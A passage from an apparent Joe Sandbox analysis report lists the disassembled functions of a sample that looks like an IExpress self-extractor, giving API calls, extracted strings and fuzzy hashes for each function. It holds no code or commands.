                              • Opcode Fuzzy Hash: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                              • Instruction Fuzzy Hash: 656195B3A3C642CAEF649B259D005BAB7A1FB04794F864931DE0953748EE79E8C1C760
                              Function 00007FF776D14DC8 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Window$CapsDeviceRect$Release
                              • String ID:
                              • API String ID: 2212493051-0
                              • Opcode ID: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                              • Instruction ID: 17b76273548811f993d8c6c1698c20b7fc6f8be5fb1e4fc99d100693b22895d2
                              • Opcode Fuzzy Hash: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                              • Instruction Fuzzy Hash: 8731A173B385018AEF149B75E8045BEBBA1F74CB99F855530CE0957B08DF78E4498B10
                              Function 00007FF776D14064 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15220
                                • Part of subcall function 00007FF776D151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15231
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15257
                                • Part of subcall function 00007FF776D151F8: LoadResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15268
                                • Part of subcall function 00007FF776D151F8: LockResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15277
                                • Part of subcall function 00007FF776D151F8: memcpy_s.MSVCRT ref: 00007FF776D15296
                                • Part of subcall function 00007FF776D151F8: FreeResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D152A5
                              • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF776D13261), ref: 00007FF776D14085
                              • LocalFree.KERNEL32 ref: 00007FF776D14108
                                • Part of subcall function 00007FF776D17958: GetLastError.KERNEL32 ref: 00007FF776D1795C
                              • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF776D13261), ref: 00007FF776D1412E
                              • LocalFree.KERNEL32(?,?,?,?,?,00007FF776D13261), ref: 00007FF776D1418F
                                • Part of subcall function 00007FF776D17D28: FindResourceA.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17D52
                                • Part of subcall function 00007FF776D17D28: LoadResource.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17D69
                                • Part of subcall function 00007FF776D17D28: DialogBoxIndirectParamA.USER32 ref: 00007FF776D17D9F
                                • Part of subcall function 00007FF776D17D28: FreeResource.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17DB1
                              • LocalFree.KERNEL32 ref: 00007FF776D14168
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Free$Local$Find$Load$AllocDialogErrorIndirectLastLockParamSizeoflstrcmpmemcpy_s
                              • String ID: <None>$LICENSE
                              • API String ID: 2987970104-383193767
                              • Opcode ID: 5dd3bd407f754cd1b0394efa61778117bb960d3fcd90b42ad91b40d7c47cf1ff
                              • Instruction ID: d0214d4db07f21691c7e786dd7df14c2435d817b3c88539b5bd7ffa56f1b1167
                              • Opcode Fuzzy Hash: 5dd3bd407f754cd1b0394efa61778117bb960d3fcd90b42ad91b40d7c47cf1ff
                              • Instruction Fuzzy Hash: D2314FB3A3D61286FF28AB31EC14777B661EB85745F824935C90D46698EFBCE4048720
                              Function 00007FF776D17984 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D179BB
                              • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D179CA
                              • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D17A1A
                              • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D17A4E
                              • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D17A67
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Free$FindLoadLock
                              • String ID: UPDFILE%lu
                              • API String ID: 3629466761-2329316264
                              • Opcode ID: 924f92d299592a6fe8a83e3fd8c1f39f55a6150d49b316aa2131220a2a41f003
                              • Instruction ID: 8406c84a2ee7d3f7691f3b3f7559e7cdb173e56b38de06ab7239223143c67fec
                              • Opcode Fuzzy Hash: 924f92d299592a6fe8a83e3fd8c1f39f55a6150d49b316aa2131220a2a41f003
                              • Instruction Fuzzy Hash: 9431A473A3C64186EF08AB35A80057AF6A1FB85B50F964635DA1E073A8CF7CE905C650
                              Function 00007FF776D1501D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67windowmemoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: LocalMessage$AllocBeepFree
                              • String ID: vclib$/
                              • API String ID: 4276092941-2126187516
                              • Opcode ID: dcb505bbb6bd45acb562ccacb79d18ad80848fdde92de6b317beeb40d266570d
                              • Instruction ID: 083a3e12f8ed167fe5eb4ed44ff2cf7c5e7b0144eb30fce91898033c48c42193
                              • Opcode Fuzzy Hash: dcb505bbb6bd45acb562ccacb79d18ad80848fdde92de6b317beeb40d266570d
                              • Instruction Fuzzy Hash: 78219CF3E3C28186FF55AB75AC043BAB651AB45795F860530CE0E07388DE7CD5818310
                              Function 00007FF776D151F8 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                              • String ID:
                              • API String ID: 3370778649-0
                              • Opcode ID: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                              • Instruction ID: 922ce33be6462b470da84421cb06cb44ca366a5d2fc9ba96874518ab36ee885a
                              • Opcode Fuzzy Hash: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                              • Instruction Fuzzy Hash: 3E111FB273DB4187EF186B66A80417AEA92EB4DFC1F899834DD0E47758DF7CD4418610
                              Function 00007FF776D150A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57windowmemoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: LocalMessage$AllocBeepFree
                              • String ID: vclib$/
                              • API String ID: 4276092941-2126187516
                              • Opcode ID: fb27ad1f6443415d0ca2f778c89a0248fa47774d961578e40cf1bef23ae7e3e9
                              • Instruction ID: 475fd2d1ee926f4ae1626bdaed01ef74cf161077940b349e890249841043b451
                              • Opcode Fuzzy Hash: fb27ad1f6443415d0ca2f778c89a0248fa47774d961578e40cf1bef23ae7e3e9
                              • Instruction Fuzzy Hash: 781178F3F3C28286FE69AF75AC143FAA651AF49795F864531CE0E17388DE7C95818210
                              Function 00007FF776D12234 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                              • String ID: wininit.ini
                              • API String ID: 3273605193-4206010578
                              • Opcode ID: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                              • Instruction ID: 00146f0cfc56cf1d905884551a1adc77fa6cbe08ac6d6a6ab08ea8ade5cbf83e
                              • Opcode Fuzzy Hash: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                              • Instruction Fuzzy Hash: 6311637363868187DF249B31E8502AAB6A2FBCC704FC68531DA4E47758DF7CD549CA10
                              Function 00007FF776D1397E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Window$Text$DesktopDialogForegroundItem
                              • String ID: vclib
                              • API String ID: 761066910-3480049729
                              • Opcode ID: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                              • Instruction ID: 02833553d0eaf5215d5431601bed173e7e8abe2522dd87c6f0608e0bdd439006
                              • Opcode Fuzzy Hash: f21d8755046b2bff5672eb5e92626a0ccf9070bb66767417a7c329f8521aba4d
                              • Instruction Fuzzy Hash: E81116E2D3C64286FE1C2B75EC1427AEA51AB8AB41FC75930C80E1539CDFFC94448720
                              Function 00007FF776D14A54 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15220
                                • Part of subcall function 00007FF776D151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15231
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15257
                                • Part of subcall function 00007FF776D151F8: LoadResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15268
                                • Part of subcall function 00007FF776D151F8: LockResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15277
                                • Part of subcall function 00007FF776D151F8: memcpy_s.MSVCRT ref: 00007FF776D15296
                                • Part of subcall function 00007FF776D151F8: FreeResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D152A5
                              • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF776D134BA), ref: 00007FF776D14A7D
                              • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF776D134BA), ref: 00007FF776D14B19
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLocal$AllocLoadLockSizeofmemcpy_s
                              • String ID: <None>$@$FINISHMSG
                              • API String ID: 1468708069-4126004490
                              • Opcode ID: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                              • Instruction ID: 30695b5125739eaa65b8335ff26ad18ae779153b30966fa94a48a040fd60e1b7
                              • Opcode Fuzzy Hash: 1d4e6bd0a63b8b8b494048026c3f832f350be4f10dc00f629820bf4d9c538aed
                              • Instruction Fuzzy Hash: A01183B3A3C24287EF24AB30A85477BF651EB85785F865535DA4D46688DF7CD4088B10
                              Function 00007FF776D1511A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Message$BeepFreeLocal
                              • String ID: vclib$/
                              • API String ID: 2161339562-2126187516
                              • Opcode ID: 6938ab803f3817b7c3ece97dd0d9a57b9fbcb831ffb1dea0c3f6645732e84ea6
                              • Instruction ID: 6aa00b8385c126f6262218511f334dfd06aed6522ad00391dc31428f03b86c3a
                              • Opcode Fuzzy Hash: 6938ab803f3817b7c3ece97dd0d9a57b9fbcb831ffb1dea0c3f6645732e84ea6
                              • Instruction Fuzzy Hash: 141196F3B3C28289EE66AF34ED042FAB750AB45B84F860431CE0D07649CF7C9585C220
                              Function 00007FF776D17C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: LibraryLoad$AttributesFile
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                              • API String ID: 438848745-476397916
                              • Opcode ID: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                              • Instruction ID: 3561a1d52d3d14f48fe82eb64ad6050d587deb9c6519b69ba00779144fdbac4b
                              • Opcode Fuzzy Hash: 49ff66dd0027909a7b800612d590b018d10ed512dde88fa856883505687205f1
                              • Instruction Fuzzy Hash: 551184B3A3C68686EF25AB30E8502FAB7A1FB89704FC50531C54D026A9DF7CDA09C710
                              Function 00007FF776D17EA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Char$Prev$Next
                              • String ID: \
                              • API String ID: 3260447230-2967466578
                              • Opcode ID: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                              • Instruction ID: 8d849e48eaaee1305a9b129df4f060fd18fcef0797795e6c250d0467d5dae22e
                              • Opcode Fuzzy Hash: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                              • Instruction Fuzzy Hash: F91198A393C6C185FF151B35AD0417BEA91A749FE1F8A8630DA2E07799CF6CDC408711
                              Function 00007FF776D1845E Relevance: 7.6, APIs: 5, Instructions: 89sleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CurrentImageInfoNonwritableSleepStartup_initterm
                              • String ID:
                              • API String ID: 303283910-0
                              • Opcode ID: 9a9ce9c72be4a88cf894129fb195be9f4e9773483a9ec84533a011363d675fab
                              • Instruction ID: 09a998eb97d268643fd015ab5b31083e8c4f5187262ac8f5ec7b22d138c33555
                              • Opcode Fuzzy Hash: 9a9ce9c72be4a88cf894129fb195be9f4e9773483a9ec84533a011363d675fab
                              • Instruction Fuzzy Hash: 454130B3A3C64686FF68EB30ED50377A2A5FB44354FD60835D54E87299CEBCE8408661
                              Function 00007FF776D1146E Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                              • String ID:
                              • API String ID: 1273765764-0
                              • Opcode ID: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                              • Instruction ID: 01df0731e501cbdc94aa89cac70e19deb893f04c99399f36b5ec6b5150f359f3
                              • Opcode Fuzzy Hash: 779d4c80867048ee85b76de8b865dc8d6e9560f81da083dc2e25c0ec5bc041cf
                              • Instruction Fuzzy Hash: CC1181B2A3CA8586FE146B71BC043BAE661FB89B65F864A30C95E063C9CF7CD1458750
                              Function 00007FF776D17B0F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleWrite
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 1065093856-4151094324
                              • Opcode ID: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                              • Instruction ID: ef57b84e2eb07edb2f7522a9b6f0a08975d4cd8d63b289c9363a31e002b26c13
                              • Opcode Fuzzy Hash: e045f108fcc8068e113ee9e0e4cf638292a1811dea5a3a985454c52ef67f7177
                              • Instruction Fuzzy Hash: 973190B363C68186EF149F60E8403AAB760FB89794F854634DA5D07798CFBCD904CB10
                              Function 00007FF776D15E44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID:
                              • String ID: *MEMCAB
                              • API String ID: 0-3211172518
                              • Opcode ID: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                              • Instruction ID: 1049394baa8be4227de218c2b17749a00fe8522886b88d88264a5585bb4eabe7
                              • Opcode Fuzzy Hash: 8f0ecc18e58d69be0ff920eef984cb1b5456fa5790288b24a30beba8d1cf7dc7
                              • Instruction Fuzzy Hash: 4D314FF2A3CB4185EE04AB24E8443BAB3A1BB45750FD24631D56D42799EFBCE484C720
                              Function 00007FF776D12308 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41registryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF776D1232B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CloseInfoOpenQuery
                              • String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                              • API String ID: 2142960691-1430103811
                              • Opcode ID: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                              • Instruction ID: 285743e708ea5bd6acc0a92f9650c2e83f9f22b2c8fe8a41f6c98fc48f4be1d3
                              • Opcode Fuzzy Hash: ffb65070036c0e638a3fb9cad9fcb0c30fa5a0b7ad628ef0fdab3ccaafb5356a
                              • Instruction Fuzzy Hash: B0111972628B80C7EB109F25F84452AFBE9F789750B955238EB8D42B28DF78D4958F00
                              Function 00007FF776D186F0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
